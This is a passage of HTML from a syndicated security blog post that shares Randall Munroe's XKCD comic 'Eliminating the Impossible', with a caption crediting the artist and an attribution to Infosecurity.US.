https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b265741e-026f-4feb-86cc-bbbf6c1d465e/eliminating_the_impossible.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs"></p> <p> <figcaption class="image-caption-wrapper"> <p class=""><strong>via the comic artistry and dry wit of Randall Munroe, creator of XKCD</strong></p> </figcaption></p></figure><p><a href="https://www.infosecurity.us/blog/2026/3/23/randall-munroes-xkcd-eliminating-the-impossible">Permalink</a></p><p> </p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/randall-munroes-xkcd-eliminating-the-impossible/" data-a2a-title="Randall Munroe’s XKCD ‘Eliminating the Impossible’"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frandall-munroes-xkcd-eliminating-the-impossible%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Eliminating%20the%20Impossible%E2%80%99" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frandall-munroes-xkcd-eliminating-the-impossible%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Eliminating%20the%20Impossible%E2%80%99" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frandall-munroes-xkcd-eliminating-the-impossible%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Eliminating%20the%20Impossible%E2%80%99" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frandall-munroes-xkcd-eliminating-the-impossible%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Eliminating%20the%20Impossible%E2%80%99" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frandall-munroes-xkcd-eliminating-the-impossible%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Eliminating%20the%20Impossible%E2%80%99" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.infosecurity.us/">Infosecurity.US</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Marc Handelman">Marc Handelman</a>. Read the original post at: <a href="https://xkcd.com/3210/">https://xkcd.com/3210/</a> </p>